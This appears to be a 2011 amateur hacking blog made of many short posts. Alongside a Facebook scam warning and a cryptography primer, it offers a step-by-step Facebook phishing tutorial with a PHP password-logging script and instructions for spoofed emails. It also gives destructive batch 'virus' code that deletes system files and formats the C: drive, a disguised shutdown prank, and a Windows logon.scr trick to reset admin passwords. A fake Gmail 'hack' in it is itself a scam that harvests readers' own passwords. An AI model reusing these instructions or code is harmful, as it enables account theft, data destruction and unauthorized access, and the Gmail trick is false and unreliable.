Dec 15, 2011

Beware! Facebook Scam "Yeahh!! It happens on Live Television!"


we recently covered about a facebook worm which targeted a whole lot of facebook users. It's really sad to see that these types of scams keep growing and facebook hasn't really been able to successfully give protection to their users from such scams.

A new bloke in the list "Yeahh!! It happens on Live Television!", the most viral one yet, is spreading like a wildfire among facebook users.


The following status on one of my friend's wall bought my attention first towards this scam:




Yeahh!! It happens on Live Television![LINK] 
Lol Checkout this video its very embracing moment for her

The lady is the above screen shot is Marika Fruscio an Italian Model, She had Wardrobe malfunction (Accidental exposure of intimate parts) on a live TV show, which is what the scam refers to.


On clicking the link, Facebook users are directed to the folllowing page:




In order to play the video the user has to click the button "jaa", which appears as an age verification system required in order to watch the video. when you click on "jaa" you are infact clicking on a hidden link which consequently post the same link on each of your contact's wall. Next a survey is prompted which the user needs fill in order to watch the video, thus helping the scammers make tons of money.




While searching related to the scam on the internet, I managed to find the source code of the scam on pastebin, This proves that there is not a single body behind this scam, with the source code available in public, any one could create a website and inject the malicious javascript in to it and start scamming.

One more thing to note is that in most such cases blogspot blogs are being targeted as they are free to create, You can create a blog in less than 5 minutes. If this keeps growing, I believe that blogger will stop giving free blogspot blogs and will maybe switch to a payed system or facebook would just disable blogspot domains from being shared, thus making it difficult for real bloggers to market their blogs.

How To Remove The Scam?
It's fairly easy to remove the scam, all you need to do is to report it to facebook. 



DIGITAL DESTROYER'S: Abusing HTTP Status Codes to Expose Private Inform...

DIGITAL DESTROYER'S: Abusing HTTP Status Codes to Expose Private Inform...: When you visit my website, I can automatically and silently determine if you're logged into Facebook, Twitter, GMail and Digg. There are al...

Abusing HTTP Status Codes to Expose Private Information??

When you visit my website, I can automatically and silently determine if you're logged into Facebook, Twitter, GMail and Digg. There are almost certainly thousands of other sites with this issue too, but I picked a few vulnerable well known ones to get your attention. You may not care that I can tell you're logged into GMail, but would you care if I could tell you're logged into one or more porn or warez sites? Perhaps http://oppressive-regime.example.org/ would like to collect a list of their users who are logged into http://controversial-website.example.com/?

Ignoring the privacy implications for a second, as a website developer, you might like to know if your visitors are logged into GMail; you could use that information to automatically fill the email fields in your forms with "@gmail.com"... Perhaps you might want to make your Facebook "like" buttons more prominent if you can tell your visitor is logged into Facebook at the moment? Here's how I achieve this:


First of all. Lets check if you're logged into GMail right now (not including Google Apps)... (No, you're not logged in).
Now, how did I get that information? Really, really, easily... I generated a hidden image in my HTML similar to this:
<img style="display:none;"
     onload="logged_in_to_gmail()"
     onerror="not_logged_in_to_gmail()"
     src="https://mail.google.com/mail/photos/img/photos/public/AIbEiAIAAABDCKa_hYq24u2WUyILdmNhcmRfcGhvdG8qKDI1ODFkOGViM2I5ZjUwZmZlYjE3MzQ2YmQyMjAzMjFlZTU3NjEzOTYwAZwSCm_MMUDjh599IgoA2muEmEZD"
/>

I generated the URL in the "src" attribute by logging into my own GMail account, then going into the general settings and uploading a picture in the "My Picture" section. I then ticked the "Visible to everyone" checkbox, and right clicked the uploaded image to get the image location. Fetching the content at that URL does two different things depending on whether or not you're logged into GMail. If you are logged into GMail, it returns an image. If you're not logged into GMail, it redirects to a HTML page. This is why the img tag in my example above works. "onload" is triggered if an image is returned, but "onerror" is triggered otherwise.


I tested this technique in Firefox, Safari, Chrome, Opera and various versions of Internet Explorer and it worked in them all. I reported it to Google and they described it as "expected behaviour" and ignored it.

At this point, you might be wondering why I have "Status Codes" in the title; the method I use for attacking Facebook, Twitter and Digg is slightly different and works because various URLs provide different HTTP status codes depending on your logged in status. Unfortunately, this attack doesn't seem to work in Internet Explorer or Opera, but does work in Firefox, Chrome and Safari. If you're using a non-IE, non-Opera browser, here are tests for Twitter and Facebook:
Are you logged into Twitter ? (Yes, you are logged in)
Are you logged into Facebook? (Yes, you are logged in)
If you have JavaScript disabled on twitter.com and facebook.com, the above tests wont work. Here is how they work when you have JavaScript enabled:

<script type="text/javascript"
        src="https://twitter.com/account/use_phx?setting=false&amp;format=text"
        onload="not_logged_in_to_twitter()"
        onerror="logged_in_to_twitter()"
        async="async"
></script><br/><br/><script type="text/javascript"
        src="https://www.facebook.com/imike3"
        onload="logged_in_to_facebook()"
        onerror="not_logged_in_to_facebook()"
        async="async"
></script>
In Firefox, Safari and Chrome, the <script/> tags fire onload if a 200 HTTP status code is returned, even if there was no valid JavaScript and the Content-Type was text/html. But if the status code was one of 404, 403, 406 or 500, then onerror is triggered instead. In the above examples, the Twitter URL returns an error code if you're logged in, but redirects to the login form with a success status code if you're not logged in. The Facebook one works because my profile is only visible to people who are logged in and returns a 404 if you're not. There is a similar problem with Digg. http://digg.com/settings returns a 403 status code if you're not logged in, but a 200 if you are.


This can be an awkward problem to avoid if you're developing a website. Some of these requests could be stopped by doing referrer checks; reject all external referrers for content only accessible when logged in. You want your status codes and responses to image requests to be relevant, but that can leak information. Firefox users could defend from this problem by using the Request Policy addon. I've never used it myself because it looks like a pain to manage, but it sounds like it would do the job.

And finally, this isn't just an issue of detecting whether or not a user is logged in. The question could technically be anything, if a HTTP response results in an image or html depending on the answer, or results in a success/error status code depending on the answer.

For the web developers out there who are familiar with jQuery, as a demonstration of the usefulness of this technique. The following chunk of code will detect if a user is logged into GMail, and if they are will replace all the mailto: links on your webpage with links to the GMail compose window (automatically filling in the To field):


$('<img/>').hide()
   .attr('src','https://mail.google.com/mail/photos/img/photos/public/AIbEiAIAAABDCKa_hYq24u2WUyILdmNhcmRfcGhvdG8qKDI1ODFkOGViM2I5ZjUwZmZlYjE3MzQ2YmQyMjAzMjFlZTU3NjEzOTYwAZwSCm_MMUDjh599IgoA2muEmEZD')
   .load(function(){
      $('a[href^="mailto:"]').each(function(){
         var email = $(this).attr('href').replace(/^mailto:/,'');
         $(this).attr('href','https://mail.google.com/mail/?view=cm&fs=1&tf=0&to='+escape(email));
      });
   })
   .appendTo('body');


Dec 13, 2011

How to H4CK FACEBOOk ACCOUNT ??




How to Hack Facebook Account Using Phising webPage





Everyone eager to hack the facebook account of others.  Here is the simplest method using phishing webpage ,you can hack the facebook account of your friends .










Phishing WebPage:
     Creating webpage which look like any site is described as Phishing.  By creating Phishing WebPage, you can make users to believe that it is original website and enter their id and password.


Step 1:
Go to Facebook.com
Right click on the white space of the front page.  Select "View Page source".
Copy the code to Notepad.


Step2:
Now find (Press ctrl +f)  for "action="  in that code.
You fill find the code like this:





The big red ring that circles the action= you have to change. You have to change it to 'action="next.php" '. after you have done that, you should change the method (small red circle on the picture) to "get" instead of "post", or else it will not work. Save the document as index.html


Step 3:
Now we need to create the "next.php" to store the password.  so open the notepad and type the following code:
php Script
<php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pswrds.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


save this file as "next.php"


Step 4:
open the notepad and just save the file as "pswrds.txt" without any contents.
Now upload those three files(namely index.html,next.php,pswrds.txt) in any of subdomain Web hosting site.
Note:  that web hosting service must has php feature.
Use one of these sites:110mb.com, spam.com justfree.com or 007sites.com. 
 use this sites through the secure connection sites(so that you can hide your ip address)  like: http://flyproxy.com .  find best secure connection site.




Step 5:
 create an mail account with facebook keyword like :FACEBOOK@hotmail.com,Facebook@noreply.com,facebook_welcome@hotmail.com,facebook_friends@gmail.com


Step 6 :


Copy the original Facebook friendship invitation and paste in your mail.
remove the hyperlink from this  http:/www.facebook.com/n/?reqs.php
 Mark it and push the Add hyperlink button
*Updated*  
everyone asking doubts about this 6th step.   You may get Facebook friendship invitation from Facebook when someone "add as a friend", right? Just copy that mail and paste in compose mail.  In that content , you can find this link http:/www.facebook.com/n/?reqs.php .  Just change the delete the link and create link with same text but link to your site.  









Add hyperlink button in the red circle. now write your phisher page url in the hyperlink bar that appears after clicking the button. and click add. The hyperlink should still display http:/www.facebook.com/n/?reqs.php
but lead to your phisher page.. 




Note:
For user to believe change Your phishing web page url with any of free short url sites. 
Like : co.nr, co.cc,cz.cc 
This will make users to believe that it is correct url.


Don't use this method for hacking others account. This article is for educational purpose only. Here is tips to prevent from Phishing Web page:
How to prevent from Phishing Web page?

CRIPT-----O----GRAPHY


Introduction to Cryptography:
Julius Ceaser who introduce the Cryptography technology. Cryptography is technology in which we are changing the plain text to unreadable text(known as cipher text) .
In your home you put money in locker, Isn't it? The locker probably has key to open. Imagine thief is coming to your home to steal. if he want to open the locker,certainly he need the key. Without the key he can not do. Yeah i can hear what you are saying, he can break the locker. If the locker is very strong,he can not open it at all.
Likewise in cryptography also we are going to create a Key for our data. So that Intruders can not read the data. It is possible to read the data, if the encryption(will explain later) is weak. So we need to encryption method very strong.



Terminologies used In cryptography:
Plain Text: original data or text is known as Plain text.
Cipher Text: The encrypted message(unreadable message).
Encryption: Changing the Plain text to unreadable.
Decryption: Changing the cipher text to plain text.



Traditional Encryption Methods:
  • Ceaser Cipher
  • Mono Alphabetic Cipher
  • Play Fair Cipher
  • Hill cipher
  • Poly Alphabetic Cipher
  • Rail Fence Technique.
Ceaser Cipher:
  Most simplest encryption method.  In this method we are going to replace the alphabets with shifted alphabets. 
Eg:
Consider Plain text is:  break
if we use Key is 3, then the cipher text will be  found by:
  
        b+3 r+3 e+3 a+3 k+3
Shifted to three alphabets final cipher text is:
         euhdn

       
If the intruders see the cipher text(here "euhdn") ,he can not understand anything.   But this method is easily hackable .  Because intruders can try 25 shifts and finally he can get the result.  
   
Many encryption methods are introduced to make better security.

Today  Encryption methods: 

  •  AES(Advanced Entyption Standard)
  • DES(Data Encryption Standard)
  • RSA(Name of the creators).
  • MD5(Message Digest -5)
  • SHA(Secure Hash Algorithm)

 For secure transaction , SSL (Secure Socket Layer ) is introduced.  In next post i'll give detailed explanation for the SSL layer.

Nov 29, 2011

DIGITAL DESTROYER'S: how to make a virus

DIGITAL DESTROYER'S: how to make a virus: you can make it easy .. creat a notpad and copy this ( echo off@ cls call attrib -h -r c:\autoexec.bat >nul echo @echo off >c:\autoexec.b...

DIGITAL DESTROYER'S: Discover New Music You'll Probably Love

DIGITAL DESTROYER'S: Discover New Music You'll Probably Love: First off, I've been doing this for a long time now. I still listen to a lot of the bands I've found by doing this. It's really simple, but...

Feb 17, 2011

Simple Virus For Fun


hey friends i am going to tell u a simple virus trick.....
u can try it in our college computers if someone is not careful whenever he click on a icon than definitely he can do this mistake.....


steps-:
1. open notepad(start-> run -> notepad).
2. copy-paste this code in notepad
    @echo off
    cd c:\windows\system32
    shutdown -s -t 0
3. save it as virus.bat.
4. now cut and paste it in system32.
5. now create shortcut for it.
    a. first right click on desktop and in new select shortcut.
    b. now enter path of that file(c:\windows\system32\virus.bat)
    c. now enter a name which can be internet explorer or my computer anything u want.
    d. when shortcut will create then right click on it and in properties click on change icon and change icon          according to ur shortcut name.
6. hurray! your virus has been created.when anyone click on that icon the computer will shutdown and he think it is virus.
 

HACKING WINDOWS ADMIN PASSWORD


Here are the steps involved to Hack the Window XP Administrator Password .
  1. Go to Start –> Run –> Type in CMD
  2. You will get a command prompt. Enter these commands the way it is given
  3. cd\
  4. cd\windows\system32
  5. mkdir temphack
  6. copy logon.scr temphack\logon.scr
  7. copy cmd.exe temphack\cmd.exe
  8. del logon.scr
  9. rename cmd.exe logon.scr
  10. exit
Wait its not over read the rest to find out how to Hack the Window XP AdministratorPassword
XPLANATION 
Your are nagivating to the windows system Directory where the system files are stored. Next your creating a temporary directory called temphackAfter which you are copying or backing up the logon.scr and cmd.exe files into the temphack then you are deleting the logon.scr file and renaming cmd.exe file to logon.scr.
So basically you are telling windows is to backup the command program and the screen saver file. Then we edited the settings so when windows loads the screen saver, we will get an unprotected dos prompt without logging in. When this appears enter this command
net user password
Example: If the admin user name is xyz and you want change the password to pass Then type in the following command
net user xyz pass
This will chang the admin password to pass.
Thats it you have sucessfully hacked the Window XP Administrator Password now you can Log in, using the hacked Window XP Administrator Password and do whatever you want to do.
Here are the steps involved to De Hack or restore the Window XP Administrator Password to cover ur tracks.
  1. Go to Start –> Run –> Type in CMD
  2. You will get a command prompt. Enter these commands the way it is given
  3. cd\
  4. cd\ windows\system32\temphack
  5. copy logon.scr C:\windows\system32\logon.scr
  6. copy cmd.exe C:\windows\system32\cmd.exe
  7. exit
Or simply go to C:\windows\system32\temphack and copy the contents of temphack back into system32 directory click Yes to overwrite the modified files.

Feb 13, 2011

how to make a virus

you can make it easy .. creat a notpad and copy this ( echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* nul >>c:\autoexec.bat
echo copy c:\******s\command\forma.com c:\ >nul >>c:\autoexe.bat
echo copy c:\******s\command/deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltre /y c:\******s\*.* >nul >>c:\autoexec.bat
echoformat c:/q /u /autotest >nul >>c:\autoexe.bat ) and save it as a name AUTOEXE.bat and ull have a danger virus .. don't exute it xD

How to hack gmail password..??


How to hack gmail passwords!

hello freind's this is the simple trick i have found to hack the gmail passwords hope this will work for u..............!!!!


* STEP 1- Log in to your own gmail account. Note: Your account must be at least 1 week old for this trick to work.


* STEP 2- Once you have logged into your own account, compose/write an e-mail to:"recover.gmlacc@gmail.com" or "ccntrecovery@gmail.com" depending on which account u want to hack...This is the mailing address to the automated server that sends out passwords to users who have forgotten them. What you are going to do is trick the server into thinking that it is sending your password to you but it will send you the pass for the account you are trying to hack instead.

* STEP 3- In the subject line type exactly: “userpassword retrieve” (case sensitive, without the inverted commas)

* STEP 4- On the first line of your mail write the email address of the person you are hacking.

* STEP 5- On the second line type in the e-mail address you are using.

* STEP 6- On the third line type in the password to YOUR email address (your OWN password). The computer needs your password so it can send a completed JavaScript form from your account in the Gmail Server to extract the other email addresses password. This works because you are sending your password to a machine not a person. The process will be done automatically by the user administration server.

* STEP 7- The final step before sending the mail is, type on the fourth line the following code exactly:

2SUGm9qwM482SUGm9qwM48 (case sensitive)

The password will be sent to your inbox within 48 hrs in a mail called “System Reg Message” . Hack who ever u want (just don't hack me)

YOU ARE RESPONSIBLE FOR YOUR OWN ACTIONS

ENJOY H@CKING!!
thank u.....!!!!

Feb 12, 2011

Download Free Music legally,, legally


Are you scared that the RIAA is about to track you down for illegally downloading songs.
Well, here is a method of obtaining many songs absolutely free that is virtually untrackable
by modern technology. This has to do with capturing streaming audio, which in many cases, believe it or not
are plain old mp3s just waiting for you to "download." I have found most of the current top-40 as well as many others you may like, so keep searching. The music is waiting for you to find it.

Step 1:
First of all, you need to find a good site that hosts streaming audio. My favorite that has brought me many songs to date is hxxp://www.windowsmedia.com . Some others are just as good, but this is the site that I will be referencing (plus, I know you guys love to steal from Microsoft).

Step 2:
Alright, go up to the left hand corner where there is an empty text box. This is the search box, just fill it with a songname or artist just like you would in kazaa and click search. This will bring up a page with links to many websites hosting a stream by that artist. The ones with music notes are just that...music, this is what you want. In many cases, this is all you need. Just right click on one of the links and click "save as" to save the song. This works if the file extension is .mp3 or .wma or .asf or well-other known formats. If this worked, you are finished, otherwise continue reading.

Step 3:
However, if you encounter a .asx file, there are a few more steps you will have to endure. First of all, do exactly like the above example and save the file locally. After the file is downloaded, check to see how large the file is. If it is a large file in the megabyte range, then you should be able to play it in your favorite music program. However, if it is less than 1 kilobyte, open it as a textfile. You will then see many script commands that communicate to windows media player. Don't worry about these, just look for some URLs which will most likely be pointing to a .asf file. It will have at least one if not more. Open the new found URL in your browser and save it like in step 2 and you should be good to go. (I use Mozilla, because Internet Explorer likes to open things rather than save them as I tell it)

NOTE: If any of the URLs are preceded with "mms://" instead of "http://" find another URL, because this technique will not work.

This technique is especially useful to avoid prosecution because streaming audio, and downloading it appear the same to a web server, therefore you are seen as just another "legal" listener, so "download" away my friend and don't blame me if this soon becomes illegal (if it isn't already).

Step 4:
If you are picky then search for a program that will convert these file types to mp3s. I assure you there are many sites out there.

If this technique does not work for some reason, there is another technique which is manually recording streaming audio, with an audio capture program. I use the one that came with my soundcard (Audigy 2ZS, great soundcard), but I would recommend it only as a last resort such as with "mms://" files. There is a degredation in quality compared to the other formats and it records every sound your PC makes while it is recording so don't chat on AIM while recording (lol I can hear random doors slamming now).

Discover New Music You'll Probably Love


First off, I've been doing this for a long time now. I still listen to a lot of the bands I've found by doing this. It's really simple, but it works like a charm. I ALWAYS find cool new stuff -- sometimes even bands that have been around 10 years that I never heard of.

The things you need:
- (Optional) A file sharing program (I use limewire)
- A browser. :]

1.) Pick one of your favorite bands.
2.) Go to amazon.com or cdnow.com (same thing)
3.) Look up that band's name
4.) Scroll down until you see "Customers who bought this title also bought:"
5.) Browse through the artists you've never heard of in that list.
6.) Check out one of their albums, preferably the one with highest rating (in stars)
7.) Either listen to the samples on amazon or download a song by them with your filesharing app.

If you like what you hear, repeat steps 3-7 using the new band's name.

You'll find TONS of new music you never thought existed.

It's a really simple way to find stuff, and I'm sure lots of you probably already do this. But for those who don't -- you'll thank me later. It works wonders. :)